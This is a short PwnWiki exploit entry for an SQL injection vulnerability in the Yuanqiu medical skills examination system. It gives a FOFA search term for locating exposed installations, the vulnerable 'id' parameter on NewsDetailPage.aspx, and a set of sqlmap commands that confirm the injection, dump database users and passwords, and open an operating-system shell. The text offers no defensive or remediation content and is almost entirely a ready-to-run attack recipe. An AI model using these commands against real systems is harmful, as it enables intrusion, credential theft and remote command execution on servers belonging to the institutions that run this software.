遠秋醫學技能考試系統 SQL注入漏洞
From PwnWiki
FOFA
远秋医学技能考试系统
注入點
http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1
SQLMAP
sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" -p id -batch sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" -users sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" --password sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" --random-agent --os-shell